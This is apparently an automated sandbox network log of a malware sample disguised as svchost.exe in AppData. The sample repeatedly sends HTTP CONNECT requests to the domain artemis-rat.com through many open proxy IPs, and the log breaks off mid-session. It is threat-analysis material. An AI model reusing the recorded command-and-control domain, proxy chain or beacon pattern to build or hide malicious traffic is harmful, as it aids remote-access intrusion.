Mar 9, 2024 13:14:36.177644968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474638939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3229	192.168.2.5	60349	114.156.77.107	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.801573992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.087182999 CET	1286	IN	HTTP/1.1 403 Forbidden Connection: close Content-Type: text/html Cache-Control: no-cache X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Length: 4872 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3230	192.168.2.5	60408	54.67.125.45	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.803085089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.977492094 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:34 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3231	192.168.2.5	60340	109.238.12.156	1365	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.808737993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.485857010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.474565029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378470898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3232	192.168.2.5	60345	3.127.62.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.811075926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.114924908 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:34 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:35.138861895 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a9 46 dd 8f de 73 fe 1f 82 b3 8d 13 24 56 ef 72 f6 b7 f7 39 57 aa 57 69 66 6c c7 74 59 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRFs$Vr9WWifltY*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:35.441771984 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 2b 95 0d 83 98 9e 38 76 df 16 7b d0 73 f7 d9 80 a8 f5 f6 3f 04 89 dc b4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9+8v{s?DOWNGRD0000H010Uartemis-rat.com0240309120940Z260309120940Z010Uartemis-rat.com0"0H0A?J*:
Mar 9, 2024 13:14:35.445914984 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 91 c5 2f 97 47 40 ca bf c6 6d 74 93 0c 41 dd ed 8c 1b de 64 48 c8 c7 ec e2 fc 4f 24 31 e9 11 39 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5e 44 9d 58 0a 8c ae 31 2e f1 59 a3 ca 40 91 b1 e4 48 43 4c 66 Data Ascii: %! /G@mtAdHO$19(^DX1.Y@HCLf_^v
Mar 9, 2024 13:14:35.750632048 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 4c 2f a8 d5 7f e5 fd 67 c8 c5 58 7a 12 89 79 dc 95 7d 4b 57 e1 d4 5c 99 3d 70 7f 4b 7e fe e2 b4 a2 42 0c 79 cd 5b 90 22 Data Ascii: (L/gXzy}KW\=pK~By["

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3233	192.168.2.5	60190	102.69.177.242	10081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.821041107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3234	192.168.2.5	60449	104.16.226.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.822360039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.976660013 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3235	192.168.2.5	60412	172.93.213.177	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.840420961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.057689905 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3236	192.168.2.5	60535	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.843713045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3237	192.168.2.5	60536	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.844652891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3238	192.168.2.5	59086	51.158.125.135	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.844813108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846230030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3239	192.168.2.5	60537	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.845405102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3240	192.168.2.5	60331	216.9.224.113	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.846049070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3241	192.168.2.5	60538	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.846551895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3242	192.168.2.5	55373	207.180.198.241	13168	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.849926949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3243	192.168.2.5	60361	103.166.141.74	20074	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.860790014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3244	192.168.2.5	59030	8.222.175.210	50554	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.875044107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3245	192.168.2.5	60460	104.22.37.236	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.892427921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.046681881 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3246	192.168.2.5	60343	124.29.249.56	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.896790981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3247	192.168.2.5	59003	79.143.187.58	1730	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.900130987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3248	192.168.2.5	60398	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.914402008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3249	192.168.2.5	60420	184.185.2.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.916510105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3250	192.168.2.5	59158	177.234.194.158	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.917078018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3251	192.168.2.5	60394	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.930141926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3252	192.168.2.5	60365	111.90.150.109	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.931101084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3253	192.168.2.5	60472	104.19.217.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.997126102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.151871920 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3254	192.168.2.5	60474	172.67.182.38	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.997129917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.151370049 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3255	192.168.2.5	60473	104.27.66.31	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
